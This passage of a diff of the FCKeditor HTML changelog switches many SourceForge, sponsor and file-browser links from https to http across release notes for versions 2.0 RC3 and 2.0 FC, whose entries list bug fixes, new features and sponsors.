BUG-1223978</a>] The context menu is now available in the source view. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1213871">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/?group_id=75348&atid=543653&func=detail&aid=1213871">SF BUG-1213871</a>] Undo has been added to table creation and table operation commands. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1205211&group_id=75348&atid=543653">SF - BUG-1205211</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1229941&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1205211&group_id=75348&atid=543653">SF + BUG-1205211</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1229941&group_id=75348&atid=543653">SF BUG-1229941</a>] Small bug in the mcpuk file browser have been corrected.</li> </ul> <p> - * This version has been partially sponsored by <a target="_blank" href="https://www.infineon.com/"> + * This version has been partially sponsored by <a target="_blank" href="http://www.infineon.com/"> Infineon Technologies AG</a>.<br /> - ** This version has been partially sponsored by <a href="https://www.visualsoft.co.uk"> - Visualsoft</a> <a href="https://www.visualsoft.co.uk/websolutions.html">Web Solutions</a>.<br /> - *** This version has been partially sponsored by <a target="_blank" href="https://www.webcrossing.com"> + ** This version has been partially sponsored by <a href="http://www.visualsoft.co.uk"> + Visualsoft</a> <a href="http://www.visualsoft.co.uk/websolutions.html">Web Solutions</a>.<br /> + *** This version has been partially sponsored by <a target="_blank" href="http://www.webcrossing.com"> Web Crossing, Inc</a>.</p> <h3> Version 2.0 FC (Final Candidate)</h3> @@ -1640,7 +1640,7 @@ <li>The new "<strong>Templates</strong>" command is now available. Now the user can select from a list of pre-build HTML and fill the editor with it. Take a look at the "_docs" for more info.** </li> - <li>The <a target="_blank" href="https://mcpuk.net/fbxp/">mcpuk's</a> File Browser for + <li>The <a target="_blank" href="http://mcpuk.net/fbxp/">mcpuk's</a> File Browser for PHP has been included in the package. He became the official developer of the File Manager for FCKeditor, so we can expect good news in the future. </li> <li>New configuration options are available to <strong>hide tabs</strong> from the <strong> @@ -1667,7 +1667,7 @@ <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1159854&group_id=75348&atid=543655">SF Patch-1159854</a>] Ther HTML output rendered by the server side integration files are now XHTML compatible. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1181823&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1181823&group_id=75348&atid=543653">SF BUG-1181823</a>] It is now possible to set the desired DOCTYPE to use when edit HTML fragments (not in Full Page mode). </li> <li>There is now an optional way to implement different "mouse over" effects @@ -1676,53 +1676,53 @@ <p> Fixed Bugs:</p> <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1162200&group_id=75348&atid=543653">SF - BUG-1162200</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1161633&group_id=75348&atid=543653">SF - BUG-1161633</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1050293&group_id=75348&atid=543653">SF - BUG-1050293</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1058948&group_id=75348&atid=543653">SF - BUG-1058948</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1109120&group_id=75348&atid=543653">SF - BUG-1109120</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155408&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1162200&group_id=75348&atid=543653">SF + BUG-1162200</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1161633&group_id=75348&atid=543653">SF + BUG-1161633</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1050293&group_id=75348&atid=543653">SF + BUG-1050293</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1058948&group_id=75348&atid=543653">SF + BUG-1058948</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1109120&group_id=75348&atid=543653">SF + BUG-1109120</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155408&group_id=75348&atid=543653">SF BUG-1155408</a>] The IE memory leak bug has been solved. The code has been completely reviewed and many memory usage improvements have been done. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1179645&group_id=75348&atid=543653">SF BUG-1179645</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1183252&group_id=75348&atid=543653">SF - BUG-1183252</a> ] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1166779&group_id=75348&atid=543653">SF - BUG-1181647</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155627&group_id=75348&atid=543653">SF - BUG-1155627</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155782&group_id=75348&atid=543653">SF - BUG-1155782</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155750&group_id=75348&atid=543653">SF - BUG-1155750</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1157166&group_id=75348&atid=543653">SF - BUG-1157166</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1157857&group_id=75348&atid=543653">SF - BUG-1157857</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1158121&group_id=75348&atid=543653">SF - BUG-1158121</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1177153&group_id=75348&atid=543653">SF - BUG-1177153</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1175847&group_id=75348&atid=543653">SF - BUG-1175847</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1155747&group_id=75348&atid=543653">SF + BUG-1183252</a> ] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1166779&group_id=75348&atid=543653">SF + BUG-1181647</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155627&group_id=75348&atid=543653">SF + BUG-1155627</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155782&group_id=75348&atid=543653">SF + BUG-1155782</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155750&group_id=75348&atid=543653">SF + BUG-1155750</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1157166&group_id=75348&atid=543653">SF + BUG-1157166</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1157857&group_id=75348&atid=543653">SF + BUG-1157857</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1158121&group_id=75348&atid=543653">SF + BUG-1158121</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1177153&group_id=75348&atid=543653">SF + BUG-1177153</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1175847&group_id=75348&atid=543653">SF + BUG-1175847</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1155747&group_id=75348&atid=543653">SF BUG-1155747</a>] There was a loading problem in Gecko browsers in some cases. It has been solved. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1161147&group_id=75348&atid=543653">SF - BUG-1161147</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1157635&group_id=75348&atid=543653">SF - BUG-1157635</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1149805&group_id=75348&atid=543653">SF - BUG-1149805</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1124600&group_id=75348&atid=543653">SF - BUG-1124600</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1117535&group_id=75348&atid=543653">SF - BUG-1117535</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1118145&group_id=75348&atid=543653">SF - BUG-1118145</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1098113&group_id=75348&atid=543653">SF - BUG-1098113</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1092272&group_id=75348&atid=543653">SF - BUG-1092272</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1086416&group_id=75348&atid=543653">SF - BUG-1086416</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1027952&group_id=75348&atid=543653">SF - BUG-1027952</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=978441&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1161147&group_id=75348&atid=543653">SF + BUG-1161147</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1157635&group_id=75348&atid=543653">SF + BUG-1157635</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1149805&group_id=75348&atid=543653">SF + BUG-1149805</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1124600&group_id=75348&atid=543653">SF + BUG-1124600</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1117535&group_id=75348&atid=543653">SF + BUG-1117535</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1118145&group_id=75348&atid=543653">SF + BUG-1118145</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1098113&group_id=75348&atid=543653">SF + BUG-1098113</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1092272&group_id=75348&atid=543653">SF + BUG-1092272</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1086416&group_id=75348&atid=543653">SF + BUG-1086416</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1027952&group_id=75348&atid=543653">SF + BUG-1027952</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=978441&group_id=75348&atid=543653">SF BUG-978441</a> ] A custom Undo/Redo system has been implemented for IE. </li> <li>The editor startup execution is now made in the right order (so configurations override works correctly). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1166779&group_id=75348&atid=543653">SF - BUG-1166779</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1166651&group_id=75348&atid=543653">SF - BUG-1166651</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1066198&group_id=75348&atid=543653">SF - BUG-1066198</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1090388&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1166779&group_id=75348&atid=543653">SF + BUG-1166779</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1166651&group_id=75348&atid=543653">SF + BUG-1166651</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1066198&group_id=75348&atid=543653">SF + BUG-1066198</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1090388&group_id=75348&atid=543653">SF BUG-1090388</a> ] No more "illegible" characters in the toolbar when "ClearType" is active. </li> <li>It is now possible to set the "width" style of the BODY tag in the EditorAreaCSS to limit the editing area size. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1113620&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1113620&group_id=75348&atid=543653">SF BUG-1113620</a>] In IE, the editor doesn't generate new entries in the browser history anymore. </li> <li>The editor now uses the same method used on version RC2 to load its contents on @@ -1732,10 +1732,10 @@ </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1190835&group_id=75348&atid=543653">SF BUG-1190835</a>] [<a target="_blank" href="https://sourceforge.net/tracker/?func=detail&atid=543653&aid=1196547&group_id=75348">SF - BUG-1196547</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1156863&group_id=75348&atid=543653">SF + BUG-1196547</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1156863&group_id=75348&atid=543653">SF BUG-1156863</a>] The "Insert Horizontal Line" command is now working correctly. Thanks to Hector Raul Colonia Coral. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1101861&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1101861&group_id=75348&atid=543653">SF BUG-1101861</a>] The editor now shows a normal textarea correctly (as expected) on Safari browsers (and all "like Gecko" browsers). Thanks to Bob Paul. </li> @@ -1743,12 +1743,12 @@ BUG-1182224</a>] The PHP connector can now handle file extensions in upper case, like JPG or Gif, correctly. Thanks to Georg Ivancsic. </li> <li>The "sample06.html" is now working correctly with Gecko browsers. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1156660&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1156660&group_id=75348&atid=543653">SF BUG-1156660</a>] Some fixes have been applied to the Universal Keyboard. Thanks to Abdul-Aziz Al-Oraij. </li> <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1192881&group_id=75348&atid=543653">SF BUG-1192881</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1185006&group_id=75348&atid=543653">SF - BUG-1185006</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1156068&group_id=75348&atid=543653">SF + BUG-1185006</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1156068&group_id=75348&atid=543653">SF BUG-1156068</a>] The "Browse Server" button is now working correctly for the Background Image in the "Document Properties" dialog window (full page editing). The active "BaseHref" is also set to the preview window. @@ -1759,21 +1759,21 @@ <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1185911&group_id=75348&atid=543653">SF BUG-1185911</a>] The Greek language file name has been corrected to "el.js". </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1181572&group_id=75348&atid=543653">SF - BUG-1181572</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1158421&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1181572&group_id=75348&atid=543653">SF + BUG-1181572</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1158421&group_id=75348&atid=543653">SF BUG-1158421</a>] The "Print" button is now active on startup. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1181572&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1181572&group_id=75348&atid=543653">SF BUG-1165219</a>] No error occours when the user defines just one color to the FontColors on "in page" configurations. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1162957&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1162957&group_id=75348&atid=543653">SF BUG-1162957</a>] The small problem with Zope (ZPT) has been solved. </li> <li>Some small RTL / LTR corrections has been done in the interface and the Farsi language has been added to the Universal Keyboard. Thanks to Silver Baghdasarian.</li> </ul> <p> - * This version has been partially sponsored by the <a href="https://www.hamilton.edu"> + * This version has been partially sponsored by the <a href="http://www.hamilton.edu"> Hamilton College</a>.<br /> - ** This version has been partially sponsored by <a target="_blank" href="https://www.infineon.com/"> + ** This version has been partially sponsored by <a target="_blank" href="http://www.infineon.com/"> Infineon Technologies AG</a>.</p> <h3> Version 2.0 RC3 (Release Candidate 3)</h3> @@ -1782,38 +1782,38 @@ <ul> <li>The editor now offers native <strong>Perl integration</strong>! Thanks and welcome to Takashi Yamaguchi, our official Perl developer. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1026584&group_id=75348&atid=543656">SF - Feature-1026584</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1112692&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1026584&group_id=75348&atid=543656">SF + Feature-1026584</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1112692&group_id=75348&atid=543656">SF Feature-1112692</a>] <strong>Formatting </strong>has been introduced to the <strong>Source View</strong>. The output HTML can also be formatted. You can choose to use spaces or tab for indentation. See the configuration file. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1031492&group_id=75348&atid=543656">SF - Feature-1031492</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1004293&group_id=75348&atid=543656">SF - Feature-1004293</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=784281&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1031492&group_id=75348&atid=543656">SF + Feature-1031492</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1004293&group_id=75348&atid=543656">SF + Feature-1004293</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=784281&group_id=75348&atid=543656">SF Feature-784281</a>] It is now possible to edit <strong>full HTML pages</strong> with the editor. Use the "FullPage" configuration setting to activate it. </li> <li>The new toolbar command, "<strong>Document Properties</strong>" is available to edit document header info, title, colors, background, etc... Full page editing must be enabled. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1151448&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1151448&group_id=75348&atid=543656">SF Feature-1151448</a>] <strong>Spell Check</strong> is now available. You can use <strong>ieSpell</strong> or <strong>Speller Pages</strong> right from FCKeditor. More info about configuration can be found in the _docs folder. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1041686&group_id=75348&atid=543656">SF - Feature-1041686</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1086386&group_id=75348&atid=543656">SF - Feature-1086386</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1124602&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1041686&group_id=75348&atid=543656">SF + Feature-1041686</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1086386&group_id=75348&atid=543656">SF + Feature-1086386</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1124602&group_id=75348&atid=543656">SF Feature-1124602</a>] New "<strong>Insert Anchor</strong>" command has been introduced. (The anchor icon is visible only over IE for now). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1123816&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1123816&group_id=75348&atid=543656">SF Feature-1123816</a>] It is now possible to configure the editor to <strong>show "fake" table borders</strong> when the border size is set to zero. (It is working only on IE for now). </li> <li><strong>Numbered</strong> and <strong>Bulleted</strong> lists can now be <strong> configured</strong> . Just right click on then. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1088608&group_id=75348&atid=543656">SF - Feature-1088608</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1144047&group_id=75348&atid=543656">SF - Feature-1144047</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1149808&group_id=75348&atid=543656">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1088608&group_id=75348&atid=543656">SF + Feature-1088608</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1144047&group_id=75348&atid=543656">SF + Feature-1144047</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1149808&group_id=75348&atid=543656">SF Feature-1149808</a>] A new configuration setting is available, "<strong>BaseHref</strong> ", to set the URL used to resolve relative links. </li> <li>It is now possible to set the <strong>content language direction</strong> . @@ -1870,7 +1870,7 @@ <li>The FCKeditor.Packager program is now part of the main package. It is not anymore distributed separately. </li> <li>The PHP connector now sets the uploaded file permissions (chmod) to 0777. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1090215&group_id=75348&atid=543655">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1090215&group_id=75348&atid=543655">SF Patch-1090215</a>] It's now possible to give back more info from your custom image browser calling the SetUrl( url [, width] [, height] [, alt] ). Thanks to Ben Noblet. </li> @@ -1884,21 +1884,21 @@ <p> Fixed Bugs:</p> <ul> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1124220&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1124220&group_id=75348&atid=543653">SF BUG-1124220</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1119894&group_id=75348&atid=543653">SF - BUG-1119894</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1090986&group_id=75348&atid=543653">SF - BUG-1090986</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1100408&group_id=75348&atid=543653">SF + BUG-1119894</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1090986&group_id=75348&atid=543653">SF + BUG-1090986</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1100408&group_id=75348&atid=543653">SF BUG-1100408</a>] The editor now works correctly when starting with an empty value and switching to the Source mode. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1119380&group_id=75348&atid=543653">SF - BUG-1119380</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1115750&group_id=75348&atid=543653">SF - BUG-1115750</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1101808&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1119380&group_id=75348&atid=543653">SF + BUG-1119380</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1115750&group_id=75348&atid=543653">SF + BUG-1115750</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1101808&group_id=75348&atid=543653">SF BUG-1101808</a>] The problem with the scrollbar and the toolbar combos (Style, Font, etc...) over Mac has been fixed. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1098460&group_id=75348&atid=543653">SF - BUG-1098460</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1076544&group_id=75348&atid=543653">SF - BUG-1076544</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1077845&group_id=75348&atid=543653">SF - BUG-1077845</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1092395&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1098460&group_id=75348&atid=543653">SF + BUG-1098460</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1076544&group_id=75348&atid=543653">SF + BUG-1076544</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1077845&group_id=75348&atid=543653">SF + BUG-1077845</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1092395&group_id=75348&atid=543653">SF BUG-1092395</a>] A new upload class has been included for the ASP File Manager Connector. It uses the "ADODB.Stream" object. Many thanks to "NetRube". </li> @@ -1910,19 +1910,19 @@ <li>The <br type= "_moz">is not anymore shown on XHTML source. </li> <li>It has been introduced a mechanism to avoid automatic contents duplication on very specific occasions (bad formatted HTML). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1146407&group_id=75348&atid=543653">SF - BUG-1146407</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1145800&group_id=75348&atid=543653">SF - BUG-1145800</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1118803&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1146407&group_id=75348&atid=543653">SF + BUG-1146407</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1145800&group_id=75348&atid=543653">SF + BUG-1145800</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1118803&group_id=75348&atid=543653">SF BUG-1118803</a> ] Other issues in the XHTML processor have been solved. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1143969&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1143969&group_id=75348&atid=543653">SF BUG-1143969</a>] The editor now accepts the "accept-charset" attribute in the FORM tag (IE specific bug). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1122742&group_id=75348&atid=543653">SF - BUG-1122742</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1089548&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1122742&group_id=75348&atid=543653">SF + BUG-1122742</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1089548&group_id=75348&atid=543653">SF BUG-1089548</a> ] Now, the contents of the SCRIPT and STYLE tags remain untouched. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1114748&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1114748&group_id=75348&atid=543653">SF BUG-1114748</a>] The PHP File Manager Connector now sets the new folders permissions (chmod) to 0777 correctly. </li> <li>The PHP File Manager Connector now has a configuration file (editor/filemanager/browser/default/connectors/php/config.php) @@ -1931,15 +1931,15 @@ to set some security preferences. </li> <li>A small bug in the toolbar rendering (strips auto position) has been corrected. </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1093732&group_id=75348&atid=543653">SF - BUG-1093732</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1091377&group_id=75348&atid=543653">SF - BUG-1091377</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1083044&group_id=75348&atid=543653">SF - BUG-1083044</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1096307&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1093732&group_id=75348&atid=543653">SF + BUG-1093732</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1091377&group_id=75348&atid=543653">SF + BUG-1091377</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1083044&group_id=75348&atid=543653">SF + BUG-1083044</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1096307&group_id=75348&atid=543653">SF BUG-1096307</a>] The configurations are now encoded so a user can use values that has special chars (&=/). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1103688&group_id=75348&atid=543653">SF - BUG-1103688</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1092331&group_id=75348&atid=543653">SF - BUG-1092331</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1088220&group_id=75348&atid=543653">SF + <li>[<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1103688&group_id=75348&atid=543653">SF + BUG-1103688</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1092331&group_id=75348&atid=543653">SF + BUG-1092331</a>] [<a target="_blank" href="http://sourceforge.net/tracker/index.php?func=detail&aid=1088220&group_id=75348&atid=543653">SF BUG-1088220</a>] PHP samples now use PHP_SELF to automatically discover the editor's base path. </li> <li>Some small wrapping problems with some labels in the Image and Table dialog windows @@ -1952,10 +1952,10 @@ new packager must be downloaded. </li> <li>A small problem with the editor focus while in source mode has been corrected. Thanks to Eric (ric1607). </li> - <li>[<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1108167&group_id=75348&atid=543653">SF - BUG-1108167</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1085149&group_id=75348&atid=543653">SF - BUG-1085149</a>] [<a target="_blank" href="https://sourceforge.net/tracker/index.php?func=detail&aid=1151296&group_id=75348&atid=543653">SF - BUG-1151296</a>] [<a target="_blank" 